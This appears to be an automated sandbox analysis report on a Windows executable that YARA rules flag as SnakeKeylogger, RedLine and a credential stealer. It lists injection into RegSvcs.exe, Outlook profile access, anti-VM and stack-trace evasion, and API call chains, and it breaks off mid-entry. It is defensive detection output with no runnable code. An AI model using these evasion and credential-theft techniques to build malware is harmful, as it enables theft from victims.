Source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.2064042860.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.3301740960.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: Process Memory Space: RegSvcs.exe PID: 5596, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@2/2

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_0066CE7A GetLastError,FormatMessageW,

0_2_0066CE7A

Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0065AB84 AdjustTokenPrivileges,CloseHandle,		0_2_0065AB84
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0065B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_0065B134

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_0066E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0066E1FD

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_00666532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_00666532

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_0067C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_0067C18C

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_0062406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_0062406B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

File created: C:\Users\user\AppData\Local\Temp\aut63EE.tmp

Jump to behavior

Source: nfKqna8HuC.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000002.00000002.3303484774.000000000318B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.000000000317C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.000000000319A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: nfKqna8HuC.exe	Virustotal: Detection: 56%
Source: nfKqna8HuC.exe	ReversingLabs: Detection: 83%

Source: unknown	Process created: C:\Users\user\Desktop\nfKqna8HuC.exe "C:\Users\user\Desktop\nfKqna8HuC.exe"
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\nfKqna8HuC.exe"
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\nfKqna8HuC.exe"	Jump to behavior

Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: nfKqna8HuC.exe

Static file information: File size 1147392 > 1048576

Source: nfKqna8HuC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: nfKqna8HuC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: nfKqna8HuC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: nfKqna8HuC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: nfKqna8HuC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: nfKqna8HuC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: nfKqna8HuC.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: nfKqna8HuC.exe, 00000000.00000003.2055618022.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, nfKqna8HuC.exe, 00000000.00000003.2056531512.0000000003B70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: nfKqna8HuC.exe, 00000000.00000003.2055618022.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, nfKqna8HuC.exe, 00000000.00000003.2056531512.0000000003B70000.00000004.00001000.00020000.00000000.sdmp

Source: nfKqna8HuC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: nfKqna8HuC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: nfKqna8HuC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: nfKqna8HuC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: nfKqna8HuC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_0063E01E LoadLibraryA,GetProcAddress,

0_2_0063E01E

Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006A2409 push 00000000h; iretd	0_2_006A240B
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006A2410 push 00000000h; retf	0_2_006A2413
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0063288B push 66006323h; retn 0069h	0_2_006328E1
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00646B05 push ecx; ret	0_2_00646B18
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006AB9D8 push 00000000h; iretd	0_2_006AB9DA
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006AB985 push 00000000h; ret	0_2_006AB98A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041C40C push cs; iretd	2_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00423149 push eax; ret	2_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041C50E push cs; iretd	2_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004231C8 push eax; ret	2_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040E21D push ecx; ret	2_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041C6BE push ebx; ret	2_2_0041C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041BFCD pushad ; ret	2_2_0041BFCE

Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00688111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00688111
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0063EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0063EB42

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_0064123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0064123A

Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RegSvcs.exe PID: 5596, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

API/Special instruction interceptor: Address: 14DFBD4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

2_2_004019F0

Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Evaded block: after key decision			graph_0-94475
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Evaded block: after key decision			graph_0-95469

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

API coverage: 4.5 %

Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00666CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00666CA9
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_006660DD
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_006663F9
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0066EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0066EB60
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0066F56F FindFirstFileW,FindClose,	0_2_0066F56F
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0066F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0066F5FA
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00671B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00671B2F
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00671C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00671C8A
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00671F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00671F94

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_0063DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0063DDC0

Source: RegSvcs.exe, 00000002.00000002.3301839819.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\nfKqna8HuC.exe	API call chain: ExitProcess graph end node			graph_0-94255
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_00676AAF BlockInput,

0_2_00676AAF

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

